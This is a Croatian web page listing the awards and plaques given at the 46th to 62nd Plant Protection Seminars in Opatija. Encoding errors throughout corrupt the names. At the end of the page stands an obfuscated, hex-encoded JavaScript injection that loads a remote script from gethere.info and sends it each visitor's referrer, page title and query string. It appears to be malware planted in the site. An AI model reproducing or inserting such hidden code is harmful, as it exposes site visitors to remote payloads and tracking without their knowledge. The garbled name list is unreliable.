NAGRADE I PRIZNANJA DODIJELJENA NA SEMINARIMA

 1. godina a�� 62. Seminar biljne zaA?tite, Opatija, 06. a�� 09. veljaA?e
  1.A�A?eljko LonA?ar, dipl. ing. a�� Srebrna plaketa i povelja uz srebrnu plaketu
  2. mr. sc.A�Vladimir Danona�� Srebrna plaketa i povelja uz srebrnu plaketu
  3.A�Marko PavkoviA�, dipl. ing. a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
  4.A�Petar A?ivkoviA�, dipl. ing. a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
 1. godina a�� 61. Seminar biljne zaA?tite, Opatija, 07. a�� 10. veljaA?e
  1. dr. sc.A�Mladen A�imalaa�� Srebrna plaketa i povelja uz srebrnu plaketu
  2. TvrtkaA�a�zAbundana�?A�a�� Priznanje
 1. godina a�� 60. Seminar biljne zaA?tite, Opatija, 09. a�� 12. veljaA?e
  1. dr. sc.A�Darka HamelA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  2.A�Krunoslav AraA?, dipl. ing. a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
  3. TvrtkaA�a�zAgrokor a�� trgovinaa�? d.d.A�a�� Priznanje
  4. TvrtkaA�a�zBOPROMa�? d.d.a�� Priznanje
  5. mr. sc.A�Gabrijel Seljaka�� Priznanje
  6. prof. dr. sc.A�Mirza DautbaA?iA�A�a�� Priznanje
 1. godina a�� 59. Seminar biljne zaA?tite, Opatija, 10. a�� 13. veljaA?e
  1. Dr. sc.A�Miro KataliniA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  2. Mr. sc.A�Jelka PuA?eljiA�a�� Srebrna plaketa i povelja uz srebrnu plaketu
  3.A�Marija BudiA?A�ak,A�dipl. ing. a�� Srebrna plaketa i povelja uz srebrnu plaketu
  4. TvrtkaA�a�zGenera d.d.a�?a�� Priznanje
 1. godina a�� 58. Seminar biljne zaA?tite, Opatija, 11. a�� 14. veljaA?e
  1. Prof. dr. sc.A�Jasminka Igrc BarA?iA�a�� Platinasta plaketa i povelja uz platinastu plaketu
  2. Prof. dr. sc.A�BoA?ena BariA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  3.A�BoA?o BokA?iA�, dipl. ing. a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
  4. TvrtkaA�a�zDow AgroSciencesa�?A�a�� Priznanje
  5.A�JoA?t JakA?a, dipl.ing. a�� Priznanje
 1. godina a�� 57. Seminar biljne zaA?tite, Opatija, 12. a�� 15. veljaA?e
  1.A�Ante GrubiA?iA�, dipl. ing. a�� Srebrna plaketa i povelja uz srebrnu plaketu
  2. Mr. sc.A�A?eljko KauzlariA�a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
  3. TvrtkaA�a�zPoljocentara�?a�� KriA?evci a�� Priznanje
  4. TvrtkaA�a�zChromos Agro d.d.a�?A�a�� Priznanje zlatnom sponzoru 57. Seminara biljne zaA?tite
 1. godina a�� 56. Seminar biljne zaA?tite, Opatija, 7. a�� 10. veljaA?e
  1. Mr. sc.A�Milorad A�ubiA�a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
  2.A�Ivan Pus, dipl. ing. a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
  3.A�Mandica DasoviA�a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
  4. TvrtkaA�a�zBayer Cropsciencea�?A�a�� Priznanje
  5. TvrtkaA�a�zBASFa�?A�a�� Priznanje zlatnom sponzoru 56. Seminara biljne zaA?tite
 1. godina a�� 55. Seminar biljne zaA?tite, Opatija, 8. a�� 11. veljaA?e
  1. prof. dr. sc.A�Irma KalinoviA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  2. dr. sc.A�A?ordano PerA?uriA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  3. prof. dr. sc.A�Boris HraA?ovecA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  4.A�Davor A?oviA�, dipl. ing. a�� Zlatna plaketa i povelja uz zlatnu plaketu
  5. TvrtkaA�a�zBASFa�?A�a�� Priznanje
  6. TvrtkaA�a�zBASFa�?A�a�� Priznanje zlatnom sponzoru 55. Seminara biljne zaA?tite
 1. godina a�� 54. Seminar biljne zaA?tite, Opatija, 9. a�� 12. veljaA?e
  1. prof. dr. sc.A�Marija IveziA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  2.A�DrA?avni zavod za zaA?titu bilja u poljoprivredi i A?umarstvu RHA�a�� ZlatnaA�plaketa i povelja uz zlatnu plaketu
  3. mr. sc.A�Vlatka FulanoviA�a�� Srebrna plaketa i povelja uz srebrnu plaketu
  4. TvrtkaA�a�zSyngentaa�?A�a�� Priznanje
  5. GospoA�aA�Mira RucnerA�a�� Zahvalnica
 1. godina a�� 53. Seminar biljne zaA?tite, Opatija, 10. a�� 13. veljaA?e
  1. dr. sc.A�Sonja KaA?iA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  2. mr. sc.A�Radoslav Mastena�� Zlatna plaketa i povelja uz zlatnu plaketu
  3.A�Franko KriA?man, dipl. ing. a�� Srebrna plaketa i povelja uz srebrnu plaketu
  4.A�Dragutin OremoviA�, dipl. ing. a�� Srebrna plaketa i povelja uz srebrnu plaketu
  5.A�Marijan Juran, dipl. ing. a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
 1. godina a�� 52. Seminar biljne zaA?tite, Opatija, 5. a�� 8. veljaA?e
  1. mr. sc.A�Ivanka A?izmiA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  2. mr. sc.A�Petar JurjeviA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  3. gospoA�aA�Marijana JeliA�A�a�� Priznanje
 1. godina a�� 51. Seminar biljne zaA?tite, Opatija, 6. a�� 9. veljaA?e
  1. prof. dr. sc.DraA?enka JurkoviA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  2.A�Petar MesiA�, dipl. ing. a�� Zlatna plaketa i povelja uz zlatnu plaketu
  3. mr. sc.A�Nedjeljka PagliariniA�a�� Srebrna plaketa i povelja uz srebrnu plaketu
  4. mr. sc.A�Branko BradiA�A�a�� Srebrna plaketa i povelja uz srebrnu plaketu
  5.A�Vladimir KiA?, dipl. ing. a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
  6. TvrtkaA�a�zFitoprometa�? d.o.o.A�a�� Priznanje
  7. TvrtkaA�a�zFlorela�? d.o.o.A�a�� Priznanje
 1. godina a�� 50. Seminar biljne zaA?tite, Opatija, 7. a�� 10. veljaA?e
  1. prof. dr. sc.A�Bogdan CvjetkoviA�A�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  2. dr.A�Zlatko A?ernjula�� Zlatna plaketa i povelja uz zlatnu plaketu
  3.A�a�zChromos Agro d.d.a�?a�� Zlatna plaketa i povelja uz zlatnu plaketu
  4.A�Agronomski fakultet SveuA?iliA?ta u ZagrebuA�a�� Zlatna plaketa i povelja uzA�zlatnu plaketu
 1. godina a�� 49. Seminar biljne zaA?tite, Opatija, 8. a�� 10. veljaA?e
  1.A�DrA?avni zavod za zaA?titu bilja u poljoprivredi i A?umarstvu Republike Hrvatskea�� Priznanje
 1. godina a�� 48. Seminar biljne zaA?tite, Opatija,10. a�� 13. veljaA?e
  1. prof. dr. sc.A�Zvonimir OstojiA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  2. prof. dr. sc.A�Milan GlavaA?a�� Zlatna plaketa i povelja uz zlatnu plaketu
  3. mr. sc.A�Ljiljana MikrutA�a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
 1. godina a�� 47. Seminar biljne zaA?tite, Opatija, 11. a�� 14. veljaA?e
  1.A�Bogomir MiloA?eviA�, dipl. ing. a�� Zlatna plaketa i povelja uz zlatnu plaketu
  2. dr. sc.A�Marija Halambeka�� Zlatna plaketa i povelja uz zlatnu plaketu
  3. mr. sc.A�Andrija BuA?anA?iA�a�� Srebrna plaketa i povelja uz srebrnu plaketu
  4.A�Ratimir Metz, dipl. ing. a�� BronA?ana plaketa i povelja uz bronA?anu plaketu
  5.A�Ivica VukoviA�, dipl. ing. a�� Priznanje
 1. godina a�� 46. Seminar biljne zaA?tite, Opatija, 12. a�� 15. veljaA?e
  1. akademikA�Milan MaceljskiA�a�� Platinasta plaketa i povelja uz platinastu plaketu
  2. prof. dr. sc.A�Ljubica ValenA?iA�a�� Zlatna plaketa i povelja uz zlatnu plaketu
  3. prof. dr.sc.A�Miroslav Harapina�� Zlatna plaketa i povelja uz zlatnu plaketu
  4.A�Stjepan KegleviA�, dip. ing. a�� Zlatna plaketa i povelja uz zlatnu plaketu
  5.A�Branko Britvec, dipl.ing. a�� Zlatna plaketa i povelja uz zlatnu plaketu
  6.A�Veljko Seiwerth, dipl. ing. a�� Zlatna plaketa i povelja uz zlatnu plaketu

 

 var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}